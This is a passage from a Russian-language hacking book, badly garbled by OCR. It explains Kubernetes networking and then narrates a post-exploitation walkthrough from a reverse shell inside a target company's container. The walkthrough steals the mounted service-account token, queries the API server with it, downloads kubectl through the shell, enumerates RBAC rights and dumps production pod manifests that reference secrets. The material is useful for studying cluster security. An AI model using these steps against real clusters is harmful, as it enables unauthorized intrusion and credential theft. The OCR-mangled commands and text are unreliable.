арр: муарр # Целевой под с селектором "арр: туарр" 
рогѕ: 
- ргоёосої: ТСР 
роге: 80 # Служба прослушивает порт 80 
ТагдеРогё: 8080 # Пересылает трафик с порта 80 на порт 8080 пода 


Затем мы отправляем этот файл манифеста для создания службы, 
и нашей службе назначается ІР-адрес кластера, доступный только 
внутри кластера: 


гооє@ретаь: /# Кибес+1 арр1у -Ғ ѕегуісе туарр.уаті. 
ѕегуісе/туарр сгеаїей 


гооё@рет аЬ: /# Кибес+1 деф ѕус туарр 
МАМЕ ТҮРЕ СШОЅТЕА -ІР ЕХТЕВМАЕ - ІР РОВТ(5) 
муарр С10ѕёегїІР 10.100.166.225 <попе> 80/ТСР 


Модуль на другом компьютере, который хочет связаться с нашим 
сервером М№Меіпх, отправит свой запрос на этот ІР-адрес кластера через 
порт 80, который затем перенаправит трафик на порт 8080 в одном из 
двух контейнеров. 

Давайте быстро создадим временный контейнер, используя обще- 
доступный образ Юоскег сиг1ітадеѕ/сиг1, чтобы протестировать эту 
настройку и пропинговать ІР-адрес кластера: 


гооЁ@ретгаБ: /# КиБесЕ\ гип -14 --гт --\маде сиг\1ітадеѕ/сиг1 мусиг1 -- ѕһ 


[5 сиг1 10.100.166.225 
<һ1>14ѕ&епіпд оп рог 8080</һ1> 


Отлично, мы можем получить доступ к контейнеру М№еіпх из клас- 
тера. 
Вы все еще со мной? Превосходно. 


Открытие приложения миру 


До этого момента наше приложение все еще было закрыто для внеш- 
него мира. Только внутренние поды и узлы знали, как связаться с ІР- 
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адресом кластера или напрямую связаться с подами. Компьютер, 
находящийся в другой сети, не имеет необходимой информации 
о маршрутизации для доступа к каким-либо только что созданным 
ресурсам. Последний шаг в этом кратком руководстве - сделать служ- 
бу доступной для вызова из внешнего мира с помощью №дерРог*. Этот 
объект предоставляет порт на каждом узле кластера, который будет 
случайным образом указывать на один из двух созданных нами моду- 
лей (мы вернемся к этому чуть позже). Мы сохраняем функцию под- 
держки устойчивости даже для внешнего доступа. 

Давайте добавим #уре: №деРог к предыдущему определению 
службы в файле манифеста: 


арімегѕіоп: %1 
- -Сокращено- - 
ѕе1есіог: 
арр: туарр # Тагдее ройѕ мі+ћ {Ве ѕе1есёог "арр:туарр" 
{уре: №деРогЕ 
рог{5: 
- -Сокращено- - 


Затем мы отправляем манифест службы еще раз: 


гоо{@ОемЕаЬ: /# КиБбесе\ арр1у -Ғ зегу1се_муарр.уат1. 
ѕегуісе/туарр сопҒідигеа 


гооє@ретаб: /# КибесЕ\ деф ѕус туарр 
МАМЕ ТҮРЕ СЕОЅТЕВ -ІР ЕХТЕКМАГ - ТР РОВТ(5) 
муарр М№одеРогі 10.100.166.225 «<попе> 80:31357/ТСР 


Любой запрос к внешнему ІР-адресу любого узла на порту 31357 
будет случайным образом достигать одного из двух модулей М№оіпх. 
Вот быстрый тест: 


гооє@АпоїћегМасһіпе: /# сиг\ 54.229.80.211:31357 
<һ1>14ѕ&епіпд оп рог 8080</һ1> 


Уфф ... теперь все сделано. Мы также могли бы добавить еще один 
уровень сети, создав балансировщик нагрузки, чтобы предоставить 
более распространенные порты, такие как 445 и 80, которые будут 
направлять трафик на этот порт узла, но давайте пока остановимся 
здесь. 


Что у Кибегпеѓеѕ под капотом? 


У нас где-то работает отказоустойчивое контейнерное приложение со 
слабой балансировкой нагрузки. Теперь самое интересное. Давайте 
присмотримся ктому, что только что произошло, и раскроем грязные 
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секреты, которые каждое онлайн-руководство, кажется, спешно заме- 
тает под ковер. 

Когда я впервые начал экспериментировать с Кибегпеѓеѕ, меня 
беспокоил тот ІР-адрес кластера, который мы получаем при созда- 
нии службы. Очень беспокоил. Откуда он взялся? Подсеть узлов - 
192.168.0.0/16. Контейнеры плавают в собственном пуле 10.0.0.0/16. 
Откуда, черт возьми, взялся этот ІР? 

Мы можем перечислить каждый интерфейс каждого узла в нашем 
кластере и не найдем этот ІР-адрес. Потому что его не существует! 
Это просто целевое правило ра 1е$. Правило передается всем узлам 
и предписывает им пересылать все запросы, отправленные на этот 
несуществующий ІР-адрес, в один из двух созданных нами модулей. 
Вот и все. Вот что такое объект службы - набор правил ірёађ1еѕ, кото- 
рые управляются компонентом, называемым КиБе-ргоху. 

КиБе-ргоху тоже является подом, но не простым, а особенным. Он 
работает на каждом узле кластера, тайно управляя сетевым трафи- 
ком. Несмотря на свое название, на самом деле он не пересылает па- 
кеты, по крайней мере в последних версиях. Он автоматически созда- 
ет и обновляет правила ірїіаБ1еѕ на всех узлах, чтобы гарантировать, 
что сетевые пакеты достигают места назначения. 

Когда пакет достигает узла (или пытается покинуть его), он автома- 
тически отправляется в цепочку ірёаБ1еѕ КИВЕ-ЗЕВ\/ТСЕ$, которую мы 
можем изучить с помощью команды іріађ1еѕ-ѕаме: 


гоо{@КиБе№ де: /# ірёаБ1еѕ-ѕауе 
-А РКЕВОЦТІМС -т соммепЕ --сотмепе "Кире" -ј КОВЕ-ЗЕВУТСЕ$ 
- - Сокращено- - 


Эта цепочка пытается сопоставить пакет с несколькими правилами 
исходя из его ІР-адреса и порта назначения (флаги -Фи --4рог®): 


- - Сокращено- - 
-А КОВЕ-ЗЕВ\УТСЕЗ -4 10.100.172.183/32 -р Ёср -т ср --йрогё 80 -ј КИВЕ-$\/С-МРЭТ 


А вот и наш непослушный кластерный ІР! Любой пакет, отправлен- 
ный на адрес 10.100.172.185, перенаправляется в цепочку КОВЕ-5\/С- 
МРЭ, которая определена несколькими строками ниже: 


- -Сокращено- - 
-А КОВЕ-5\/С-МРЭТ -м ${а{1.51с - -тойе гапот --ргоБа Лу 0.50000000000 -ј КОВЕ-ЅЕР-СЕСІ 


-А КОВЕ-5\/С-МРЭТ -м ${а{151с - -тойе гапот --ргоБа Лу 0.50000000000 -ј КУВЕ-ЗЕР-МИВИ 


Каждое правило в этой цепочке случайным образом сопоставляет 
пакет в 50 % случаев и перенаправляет его в другую цепочку, кото- 
рая в конечном итоге отправляет пакет одному из двух работающих 
модулей. Устойчивость объекта службы - не что иное, как следствие 
работы статистического модуля ірёађ1еѕ: 
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- -Сокращено- - 
-А КОВЕ-ЗЕР-СЕСТ -р ср -т Ёср -ј ОМАТ --ёо-еѕііпаіоп 192.168.127.78:8080 


-А КОВЕ-ЗЕР-МОВМ -р ср -т ср -ј ОМАТ --ёо-еѕііпаіоп 192.168.155.71:8080 


Пакет, отправленный на порт узла, будет следовать той же цепоч- 
ке обработки, за исключением того, что он не будет соответствовать 
ни одному правилу ІР кластера, поэтому автоматически отправится 
в цепочку КУВЕ-МОБЕРОВТ$. Если порт назначения совпадает с пред- 
варительно объявленным портом узла, пакет перенаправляется на 
сервер балансировки нагрузки. Цепочка КУВЕ-5\С-МРЭТ, которую мы 
видели, распределяет ее по подам случайным образом: 


- -Сокращено- - 
-А КОВЕ-ЅЕВМІСЕЅ -т соттеп --сомтепе "1аѕ гие іп 15 сһаіп" -м аййгёуре 
--05- буре ГОСАЕ -ј КУВЕ-МОБЕРОВТ$ 


-А КОВЕ-М№ОРЕРОВТЅ -р ср -м ёср --ЧрогЕ 31357 -ј КОВЕ-5С-МРЈІ 


Вот и все: просто продуманная цепочка правил ірёађБ1еѕ и сетевых 
маршрутов. 

В Киђегпеѓеѕ каждая маленькая задача выполняется выделенным 
компонентом. КибБе-ргоху отвечает за настройку сети. Он отличается 
тем, что работает как модуль на каждом узле, в то время как осталь- 
ные основные компоненты работают внутри нескольких модулей на 
выбранной группе узлов, называемых главными узлами. 

Среди 100 узлов, которые мы создали при создании кластера из 
100 машин, на одном главном узле будет размещена коллекция моду- 
лей, составляющих спинной мозг Киђегпеѓеѕ: сервер АРІ, планиров- 
щик и диспетчер контроллеров (рис. 7.6). 


Узел 2 


Сервер АР! 
Корневой 
0№5 


Диспетчер 


контрол- 


леров 
Плани- 
Ө ни 


Узел 1 - главный 


Узел 5 


Рис. 7.6. Поды, работающие на главном узле, по сравнению с подами 
на обычных узлах 
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ШТУ В конфигурации с несколькими главными узлами у нас 
будет три или более реплик каждого из этих подов, но только один ак- 
тивный под на службу в любой момент времени. 


На самом деле мы уже взаимодействовали с главным узлом при ис- 
пользовании команд КиБес{1 арр1у для отправки файлов манифеста. 
Кибесі - это оболочка, которая отправляет НТТР-запросы на важ- 
нейший под сервера АРТ, основную точку входа для извлечения и со- 
хранения знаменитого желаемого состояния кластера. Вот типичная 
конфигурация, которую можно использовать для доступа к кластеру 
Киђегпеѓеѕ (~/ .КиБе/сопҒід): 


арімегѕіоп: №1 
Кіпа: СопҒід 
сТиз{егз: 
- СТизфег: 
сегііҒісаёе-аџЁћогіёу: /гоої/ .тіпікибе/са.сгі 
ѕегмег: һёЁрѕ: //192.168.99.100:8443 
паме: тіпікиБе 
- - Сокращено- - 
иѕегѕ: 
- паме: ѕрагс 
узег: 
с1лепё-сегЕіҒісае: /гоо{/.тАплКиБе/с1\епе. сг 
с1ліепё-Кеу: /гоої/ .тіпікибе/с1лепї. кеу 
- - Сокращено- - 


ОВГ-адрес нашего сервера АРІ в данном случае — ћї1р://192. 
168.99.100. Если коротко, сервер АРІ ~ это единственный модуль, ко- 
торому разрешено читать/записывать желаемое состояние в базе 
данных. Хотите получить список подов? Спросите сервер АРІ. Хотите 
сообщить о сбое модуля? Сообщите серверу АРІ. Это главный оркест- 
ратор, который дирижирует сложной симфонией Киђегпеѓеѕ. 

Когда мы отправили наш файл развертывания на сервер АРІ через 
Кибес 1 (НТТР), он выполнил ряд проверок (аутентификация и авто- 
ризация, о которых мы поговорим в главе 8), а затем записал этот 
объект развертывания в базу данных еїсӣ, которая является базой 
данных типа «ключ-значение» и поддерживает согласованное состоя- 
ние на нескольких узлах (или модулях) с использованием алгоритма 
консенсуса ВаЁ.В случае с Кирегпеѓеѕ е{с4 описывает желаемое состо- 
яние кластера, например количество модулей, их файлы манифеста, 
описания служб, описания узлов ит. д. 

Как только сервер АРІ записывает объект развертывания в е{с4, 
желаемое состояние официально изменяется. Он уведомляет обра- 
ботчик обратного вызова, который подписался на это конкретное со- 
бытие, - так называемый контроллер развертывания, другой компо- 
нент, работающий на главном узле. 
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Все взаимодействия внутри Киђегпеѓеѕ основаны на этом типе 
управляемого событиями поведения, что стало возможным благода- 
ря функции наблюдения е{с4. Сервер АРІ получает уведомление или 
действие. Он считывает или изменяет желаемое состояние в еЁсі, что 
запускает событие, доставляемое соответствующему обработчику. 

Контроллер развертывания запрашивает сервер АРІ отправить об- 
ратно новое желаемое состояние, замечает, что развертывание было 
инициализировано, но не находит никаких ссылок на группу моду- 
лей, которыми он должен управлять. Он устраняет это несоответ- 
ствие, создавая объект Вер\1са5е{, описывающий стратегию репли- 
кации группы модулей. 

Эта операция снова проходит через сервер АРТ, который еще раз 
обновляет состояние. Однако на этот раз событие отправляется конт- 
роллеру ВерІісаЅеї, который, в свою очередь, замечает несоответствие 
между желаемым состоянием (группа из двух подов) и реальность 
(без подов). Он переходит к созданию определения контейнеров. 

Этот процесс (как вы уже догадались) снова проходит через АРІ- 
сервер, запускающий после изменения состояния обратный вызов 
для создания пода, за которым следит КибБе-ѕсһейџшег (выделенный 
под, работающий на главном узле). 

Планировщик видит два модуля в базе данных в состоянии ожида- 
ния. Для него это неприемлемая ситуация. Он запускает свой алго- 
ритм планирования, чтобы найти подходящие узлы для размещения 
этих двух модулей, обновляет описания модулей соответствующими 
узлами и отправляет лот на сервер АРІ для сохранения в базе данных. 

Последней частью этого бюрократического безумия является куб- 
лет (КаБее{) - это процесс (не модуль!), выполняемый на каждом 
рабочем узле, который регулярно получает список модулей, которые 
он должен запускать, с сервера АРТ. Кублет обнаруживает, что на его 
хосте должны быть запущены два дополнительных контейнера, по- 
этому он запускает их через среду выполнения контейнера (обычно 
Роскег). Наши поды наконец-то оживают. 

Сложно? Не то слово. Но нельзя отрицать красоту этой схемы син- 
хронизации. Хотя мы рассмотрели только один рабочий процесс из 
множества возможных взаимодействий, будьте уверены, что теперь вы 
сможете понять почти каждую прочитанную вами статью о Киђегпеѓеѕ. 
Мы даже готовы перейти к следующему шагу, потому что, если вы не 
забыли, у нас есть настоящий кластер, ожидающий нас в МХК А5. 


Дополнительные ресурсы 


• Дополнительные сведения о мостах и пулах мостов можно найти 
в документации по роскКег: 05 ;//10сѕ.Роскегсот/пеђуогк/Бгіаде/. 


• Поды в Ата7оп Е1аѕііс Кођегпеѓеѕ Ѕегуісе (ЕК$) напрямую подклю- 
чаются к сетевому интерфейсу Е]аѕііс, а не через мостовую сеть. 
Подробнее см. ћіірѕ;//атгп.:0/3 78 5с. 
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Дополнительные сведения о сети Киђегпеїеѕ между подами см. на 
странице ћіёр;//і.1у/Забһ]Х. 


Вот обзор других способов доступа к кластеру извне: ИНр./ЬИ. 
[у/ЗбасаЕЦ. 

Для получения дополнительной информации о еёсӣ см. ИНру/ЮИ. 
1/36 МА/Кг и һїір://01.1у/2545469. 


Взлом Кифегпеез через АРІ без аутентификации описан на һіїр;// 
1/36 МВК45. 


ПОБЕГ ИЗ КУВЕКМЕТЕ$ 


Вооружившись новыми знаниями о Киђегпеїѓеѕ, мы воз- 
вращаемся к нашей импровизированной удаленной 
оболочке в приложении для опроса, чтобы собирать ин- 
формацию, повышать привилегии и, надеюсь, найти путь 
к интересным данным о таргетинге пользователей. 
Мы возобновляем доступ к оболочке в контейнере зиг- 
уеуарр и смотрим на переменные среды: 


ѕһе11> епу 


КИВЕАМЕТЕЅ_ ЅЕВМІСЕ_РОВТ_ НТТРЅ=443 
КИВЕВМЕТЕ$_РОВТ_443_ТСР_РОВТ=443 
КИВЕВМЕТЕ$_РОВТ_443_ТСР=Еср://10.100.0.1:443 


Благодаря нашим новым знаниям эти переменные среды приобре- 
тают новое значение: КОВЕКМЕТЕЅ _РОВТ_443_ТСР должна ссылаться на 
ІР-адрес кластера, скрывающий сервер АРІ, знаменитый оркестра- 
тор Кибегпеїеѕ. В документации указано, что АРІ соответствует стан- 
дарту ОрепАРІ, поэтому мы можем выбрать маршрут по умолчанию 
[арі с помощью печально известной утилиты суг(. Переключатель -Ё 
в сиг1 следует за перенаправлениями НТТР, а переключатель -К иг- 
норирует предупреждения $5Т.-сертификата. Мы попробуем это сде- 
лать, как показано в листинге 8.1. 
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Листинг 8.1. Попытка доступа к маршруту [арі по умолчанию 
на сервере АР! 


ѕһе11> сиг1 -ЁК ВЕЕр$://10.100.0.1/ар\ 


ме5заде: ҒогЬіадеп: Цзег "ѕуѕіет:апопутоиѕ" саппої деф раһ "/арі", 
геаѕоп: ЕогБідйеп 


Ой, нас заблокировали! Впрочем, ответ, который мы получили, не 
должен сильно удивлять. Начиная с версии 1.8 Кирегпеѓеѕ поддержи- 
вает стабильную версию управления доступом на основе ролей (гоІе- 
Базе ассеѕѕ сопїтої, КВАС) – модели безопасности, которая блокиру- 
ет доступ к серверу АРІ для неавторизованных пользователей. Даже 
«небезопасный» АРІ, прослушивающий порт 8080, ограничен адресом 
локального хоста: 


ѕһе11> сиг -Ё һр: //10.100.0.1:8080 
(Еітеоџї) 


Чтобы понять, сможем ли мы обойти это ограничение, нужно более 
подробно рассмотреть систему КВАС Киђегпеѓеѕ. 


Система ВВАС в Кибегпеѓеѕ 


В Кибегпее$ применяется довольно стандартная реализация КВАС. 
Администраторы могут создавать учетные записи пользователей для 
операторов-людей или учетные записи служб, которые можно назна- 
чать подам. Каждая учетная запись пользователя или службы допол- 
нительно связана с ролью, имеющей определенные привилегии - по- 
лучение, перечисление, изменение ит. д. – над такими ресурсами, как 
поды, узлы и секреты (ѕесгеї). Связь между субъектом (пользователем 
или учетной записью службы) и ролью называется привязкой (ђіпаіпе). 


Секрет в Кибетее$ – это часть конфиденциальных 
данных, хранящихся в базе данных еса и подлежащих ограничению 00- 
ступа. Секрет служит альтернативой жестко запрограммированным 
паролям в манифесте пода. Он вводится во время выполнения через пе- 
ременные среды или смонтированную файловую систему. 


Как и любой другой ресурс Киђегпеѓеѕ, учетные записи служб, роли 
и их привязки определяются в файлах манифеста, хранящихся в базе 
данных еісӣ. Определение учетной записи службы выглядит пример- 
но так, как показано в листинге 8.2. 


Листинг 8.2. Файл манифеста СиЯегКоеВтатд 


# Определение учетной записи службы 


арімегѕіоп: №1 
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Кіпа: ЅегуісеАссоџпЁ # развертывание учетной записи службы 
пеадаёѓа: 
- паме: пеёгісѕ-го # имя учетной записи службы 


# Связывание учетной записи с ролью администратора кластера 


арімегѕіоп: гБас.аџћогіғаёіоп.К85.10/%1 
кіпа: С1иѕёегВо1еВіпаіпо 
ме{фада{а: 
паме: тападег-Б\пд1пд # имя связывания 
ѕибјесіѕ: 
- Кіп: ЅегуісеАссоџпї 
пате: теёгісѕ-го # имя учетной записи службы 
ар\Сгоир: "" 
го1еће#: 
Кіпа: С1иѕёегАо1е 
паме: с1иѕЁег-айтіп # роль по умолчанию со всеми привилегиями 
ар\Сгоир: "" 


Администратор, который хочет назначить учетную запись службы 
обычному поду, может добавить одно свойство зегу1сеАссоип Мате, 
например: 


ар\\ег$1оп: \1 

Кіпа: Род # Ме мап Ёо Яер1оу а Рой 

пеадаёѓа: 

- -Сокращено- - 

Ѕрес: 

сопёаіпегѕ: 

ѕегуісеАссоџпЁМапе: меЁгісѕ - го 
- папе: поіпх # Рігѕі сопЁаіпег 

- -Сокращено- - 


Ранее мы обращались к серверу АРГ без какой-либо аутентифика- 
ции, поэтому нам, естественно, был назначен анонимный пользова- 
тель по умолчанию зуз{ем: апопутоџѕ, у которого отсутствуют какие- 
либо привилегии. Это помешало нам получить доступ к серверу АРІ. 
Здравый смысл подсказывает, что контейнер, в котором отсутствует 
атрибут зегу1сеАссоип* Маме, также унаследует тот же статус аноним- 
ной учетной записи. 

Это разумное предположение, но Киђегпеѓеѕ работает по-другому. 
Каждому поду без учетной записи службы автоматически назначает- 
ся учетная запись зузет: ѕегуісеассоцпі : ЧеРаи\{ : ЧеРау {. Обратите 
внимание на тонкую разницу между «анонимным» и «по умолча- 
нию». Второе определение кажется менее опасным, чем первое. Оно 
вызывает больше доверия. Внутри контейнера даже смонтирован то- 
кен аутентификации! 

Ищем учетную запись службы, смонтированную по умолчанию 
контейнером: 
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ѕһе11> моипе |9гер -1 ѕесгеЁѕ 
тр#ѕ оп /гип/ѕесгеЁѕ /Ккибегпеёеѕ .іо/ѕегуісеассоџпі Ёуре ЁтрЁѕ (го, ге1аЁіте) 


ѕһе11> са /гип/ѕесгеЁѕ /Кибегпеёеѕ .1о/ѕегуісеассоџпі/Еокеп 
еујһЬСсі04 750211№151тр2СІ61ІтохМАҮ4М2си№јІ5Ү2Ет2СВ1... 


Токен учетной записи на самом деле представляет собой подпи- 
санную строку нотации объектов Јауа$сгірі (Јауа$сгірі ОБјесї Моѓайоп, 
ЈЅ0ОМ), также известную как веб-токен ЈЅОМ (]Ј503№ Мер ТоКкеп, ЈМТ). 
Эта строка содержит информацию, определяющую учетную запись 
службы. Мы можем декодировать с помощью Баѕеб4 часть строки ЈМТ, 
чтобы подтвердить подлинность учетной записи службы по умолча- 
нию и получить немного информации: 


ѕһе11> са /гип/ѕесгеёѕ /КиБегпеёеѕ .іо/ѕегуісеассоипё/&океп \ 
| соё -9“.” -Е 2 \ 
| Базеб4 -9 


{ 


155": "Кибегпефе$ /зегу\сеассоип*", 

"КиБегпе{е$ .іо/ѕегуісеассоипё/патеѕрасе": "ргой", 

"КиБегпе{е$ .іо/ѕегуісеассоипё/ѕесгеі. пате": "еҒаџ1+-океп-2трсд", 

"Кибегпе{е$ .1о/ѕегуісеассоџпі/ѕегуісе-ассоџпі. пате": "деҒаџ1+", 

"КиБегпеќїеѕ .іо/ѕегуісеассоипё/ѕегуісе-ассоипё.иіа": "956#ба51-0854-11еа-905#-06с1608с2йсс", 


"ѕир": "ѕуѕЁет: ѕегуісеассоџпі:ргой: іеҒац1+" 


) 


ЈҮТ имеет несколько обычных полей, также называемых зарегист- 
рированными заявлениями (гееіѕїегеа сІаіт): эмитент (155), которым 
в данном случае является контроллер учетных записей службы Ки- 
бегпеѓеѕ; тема (506), которая является именем учетной записи; и про- 
странство имен (подробнее об этом чуть позже), в данном случае это 
ргод. Очевидно, что мы не можем изменить эту информацию, чтобы 
выдать себя за другую учетную запись, не аннулируя подпись, добав- 
ленную к этому файлу ]ЗОМ. 

Пространство имен (патеѕрасе) – это логический раздел, разде- 
ляющий группы ресурсов Кифбегпетез, такие как поды, учетные запи- 
си служб, секреты и т. д., обычно назначаемые администратором. 
Это «мягкий» барьер, который позволяет создавать более детальные 
разрешения КВАС, например роль с разрешением «перечислить все 
поды» будет ограничена перечислением подов, принадлежащих ее 
пространству имен. Учетная запись службы по умолчанию также за- 
висит от пространства имен. Каноническое имя учетной записи, кото- 
рую мы только что получили, - зуз{ем: зегу1сеассоип* :ргой: ЧеРац1{. 
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Я описываю пространство имен как «мягкую» схему 
изоляции, поскольку узлы не подчиняются пространствам имен. Адми- 
нистраторы всегда могут попросить КиБе-ѕсһейџег назначать поды 
данного пространства имен только узлам с заданным тегом или ан- 
нотацией, но многие считают, что это противоречит всей сути Ки- 
регтеіеѕ. Кроме того, весь сетевой трафик по умолчанию направляется 
внутри кластера независимо от пространства имен. 


Этот токен дает нам вторую возможность запросить сервер АРІ. Мы 
загружаем содержимое файла в переменную ТОКЕМ и повторяем наш 
первый НТТР-запрос из листинга 8.1, отправляя переменную ТОКЕМ 
в качестве заголовка АџЁћогіғаЁіоп: 


ѕһе11> ехрогЕ ТОКЕМ=$(сае /гип/зесгее$ /КиБегпе{е$ .1о/зегу1сеассоипе /+оКеп) 
ѕһе11> сиг1 -к һеёрѕ://10.100.0.1/арі --һеайег “АџЕһогіға+іоп: Веагег $ТОКЕМ” 


"Кіпа": "АРІМегѕіопѕ", 

"мегѕіопѕ": ["\1"], 

"ѕегуегАййгеѕ5ВуС1іепЕсІрАѕ": [{ 

"сІлепЕСІрА": "0.0.0.0/0", 

"ѕегуегАййгеѕ5": "1р-10-0-34-162.еџ-меѕї-1.сотриѓе.іпёегпа1:443" 


2 


Ха! Похоже, учетная запись службы по умолчанию действительно 
имеет больше привилегий, чем анонимная учетная запись. Нам уда- 
лось получить действительный идентификатор внутри кластера. 


Разведка, второй заход 


Вернемся к разведке. Загрузим спецификацию АРІ, доступную на ко- 
нечной точке ћіЁрѕ: //10.100.0.1/орепарі/у2, и изучим имеющиеся 
возможности. 

Начнем с получения конечной точки /муегѕіоп кластера. Если клас- 
тер достаточно старый, можно попробовать использовать общедо- 
ступный эксплойт для повышения привилегий: 


ѕһе11> сиг1 -1К һ&рѕ://10.100.0.1/уегѕіоп --Веадег "АџЕһогіғаїіоп: Веагег $ТОКЕМ" 


{ 
"та)ог": "1", 
"тіпог": "14+", 
"9іМегѕіоп": "у1.14.6-екѕ-5047ей", 
"БиіЛараёе": "2019-08-21722:32:407", 
"доМегѕіоп": "901.12.9", 
- -Сокращено- - 
} 


МХК Ад$ использует Кифегпете$ 1.14 на основе НазЯс Кирегпеѓеѕ 
Ѕегуісе (ЕК5). Это версия Кибегпе{ез, используемая А\У5. В этой кон- 
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фигурации АМ/Ѕ размещает сервер АРІ, еїса и другие контроллеры 
в своем собственном пуле главных узлов, также называемом плос- 
костью контроллера (сопїтоїег рІапе). Клиент (в данном случае МХВ 
Ааѕ) размещает только рабочие узлы (плоскость данных). 

Это важная информация, поскольку версия Киђегпеѓеѕ от АМГ$ обес- 
печивает более сильную привязку между ролями ІАМ и учетными 
записями служб, чем версия с самостоятельным размещением. Если 
мы взломаем правильный под и захватим токен, то сможем атаковать 
не только кластер КиБегпе{ез, но и ресурсы АМ! 

Мы продолжаем наше исследование, пробуя несколько конечных 
точек АРІ из документации ОрепАРІ. Мы пробуем ар\/\1 /памезрасе$ / 
деРац{ /зесгеф$/, арі /%1/патмеѕрасеѕ /ЧеРац\ + /зегу1сеассоип{$ и кучу 
других конечных точек, которые соответствуют ресурсам КиБегпе(ез, 
но нас неоднократно отвергают с сообщением об ошибке 401. Если 
мы будем продолжать в том же духе, слишком частые ошибки при- 
влекут ненужное внимание. К счастью, существует АРІ Кибегпеѓеѕ под 
названием /аріѕ/аџёһогіғаііоп.К85 .10о/\1/зе1\Р 56 ]есфассеззге\м\еи, 
который сразу сообщает нам, можем ли мы выполнить действие над 
данным объектом. 

Вызывать эту точку вручную с помощью си!-запроса неудобно, так 
как для этого потребуется длинная и уродливая полезная нагрузка 
в формате ]$ОМ, поэтому мы загружаем программу Киђесі через нашу 
обратную оболочку. На этот раз нам не нужно настраивать файл кон- 
фигурации, потому что Киђесі автоматически обнаруживает перемен- 
ные среды, введенные кластером, загружает текущий токен из смонти- 
рованного каталога и сразу же становится полнотью работоспособным. 
При помощи следующих команд мы загружаем бинарный файл Кибесі, 
делаем его исполняемым и снова получаем версию кластера: 


ѕһе11> идее ВЕЁрз: //тхгайѕ-агсһімеѕ-раскеЁѕ -11пих.53-еџ-неѕЁ-1. апагопамѕ. сот/КиБесе1 
ѕһе11> сһтоа +х КиБес+1 && ./КиБес 1 уегѕіоп 


бегуег Мегѕіоп: мегѕіоп.ІпҒо {Мајог: "1", Міпог: "14+", СіМегѕіоп: "\1.14.6-еК$-5047е4"... 


Прекрасно! Все работает нормально. Теперь мы многократно вы- 
зываем команду аи сап-1 для наиболее распространенных инструк- 
ций - получить поды, получить службы, получить роли, получить сек- 
реты и т. д., - чтобы полностью изучить все привилегии, назначенные 
токену по умолчанию, с которым мы работаем: 


ѕһе11> ./КиБесЕ\ мегѕіоп ау сап-1 де пойеѕ 
по 
ѕһе11> ./КкиБес1 мегѕіоп аиЁһ сап-1 де ройѕ 
уеѕ 


Мы быстро приходим к выводу, что единственное разрешение, ко- 
торое у нас есть в настоящее время, – это перечисление подов в клас- 
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тере. Но когда мы явно вызываем команду де* ройѕ, то получаем сле- 
дующую ошибку: 


ѕһе11> ./КиБесе\ де ройѕ 

Еггог Ёгот зегуег (ҒогБіддеп): ройѕ 15 ҒЁогЬіййеп: Цзег "ѕуѕЁет: ѕегуісеассоџпі: 
ргод:ЧеРац 14" саппоЁ 115+ гезоигсе "ройѕ" іп 

АРТ дгоир "" іп һе патеѕрасе "деҒаи1&" 


Что, если мы попытаемся настроить таргетинг на пространство 
имен рго4 – то же самое, в котором размещена наша учетная запись 
службы? 


ѕһе11> ./КиБесЕ\ де ройѕ -п ргой 

ѕаЁѕ -ер1оутеп-41йе-4јха1 1/1 Аиппіпоя 09 13һ51т 
гедіѕ -ер1 - 690с-0уѕ1Ғ 1/1 Аиппіпо Ө 21һ43т 
ѕ5р-е1аѕііс-фер1 -Зӣбс-3д07х 1/1 Аиппіпоя Ө 14һ39т 
ѕ5р-Ёеейег-йер1оутепё-13Ғе-Зеух 1/1 Аиппіпд 09 10һ18т 


арі-соге-дер1оутепё-034с-79хт 1/1 Виппіпя 0 10һ18т 
- -Сокращено- - 


Неплохо! Мы получили список многих сотен подов, работающих 
в пространстве имен ргой. 

Поскольку все поды без удостоверения работают с одной и той же 
учетной записью службы по умолчанию, если один человек предо- 
ставит дополнительные привилегии этой учетной записи по умол- 
чанию, все остальные поды, работающие с тем же удостоверением, 
автоматически наследуют эти же привилегии. Для этого достаточно, 
чтобы кто-то из ІТ-специалистов компании, не особо задумываясь, 
выполнил команду Кибес{1 арр1у -Ё <иг[>, которая берет непроду- 
манное определение ресурса из малоизвестного репозитория СИНиЬ 
и поспешно применяет его к кластеру. Иногда говорят, что команда 
установки Киђесії – это новый суг( <игф> | $1 в мире уязвимостей. 
Это скрытая расплата за отказ от сложности: люди могут вслепую из- 
влекать и применять файлы манифеста из СіНир, не проверяя и даже 
не понимая последствий самих инструкций, которые они выполня- 
ют, иногда даже предоставляя дополнительные привилегии учетной 
записи службы по умолчанию. Вероятно, в данном случае именно 
это и произошло, поскольку учетная запись по умолчанию не имеет 
встроенного набора привилегий. 

Но это только верхушка айсберга. С правильными флагами мы мо- 
жем даже получить полный манифест каждого пода, что даст нам ис- 
черпывающее изобилие информации, как показано в листинге 8.3. 
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Листинг 8.3. Загрузка файла манифеста пода 


ѕһе11> ./КиБес{1 де ройѕ -п ргой -о уаті > оџёриё.уат1 
ѕһе11> Неад -100 оџЁриЁ.уаті 


--Ѕпір-- 
Ѕрес: 
сопїаіпегѕ: 
1таде: 886371554408. Кг.есг.еџ-меѕї-1. атагопамѕ. сот/арі-соге 
пате: арі-соге 
- епу: 
- пате: ОВ_СОВЕ_РА$5$ 
уа1иеҒ гоп: 
ѕесгеїКеуВеёЁ: 
Кеу: раѕѕмогӣі 
пате: дБСогеРаѕѕмогӣ 
уо1итеМоипЁѕ : 
- поипЕРаЕН: /маг/гип/ѕесгеЁѕ/Кибегпеёеѕ .1о/ ѕегуісеассоипё 
пате: арісоге-Ёокеп-2трсо 
геай0п1у: гие 
подеМате: 1р-192-168-162-215 .еџ-меѕ-1.сотрие.іпёегпа1 
һоѕЁІР: 192.168.162.215 
рһаѕе: Аиппіпд 
родїр: 10.0.2.34 
- - Сокращено- - 


И этот усеченный вывод, друзья мои, относится всего лишь к од- 
ному поду! У нас есть разрешение только на получение информации 
о подах, но, к счастью, это означает доступ к файлам манифеста по- 
дов, которые включают узлы, на которых работают поды, имена сек- 
ретов, учетные записи служб, смонтированные тома и многое другое. 
Это почти полная разведка на уровне пространства имен с одним 
крошечным разрешением в руках. 

Впрочем, полученные данные ужасно неудобны. Ручное копание 
в файлах УАМГ - это наказание, которое следует назначать только 
вашему заклятому врагу. Мы можем отформатировать результат из 
листинга 8.5, используя мощные настраиваемые выходные фильтры 
КиБесП: 


ѕһе11> ./КиБесе1 деф ройѕ -0=”си$Фот-со\итп$=\ 
МОРЕ: .зрес.подеМаме, \ 
РОО: .меёайа+а. паме” 


М№ОрЕ РОВ 

1р-192-168-162-215.еи-... арі -соге-йер1оутепі-й34с- 7дхт 
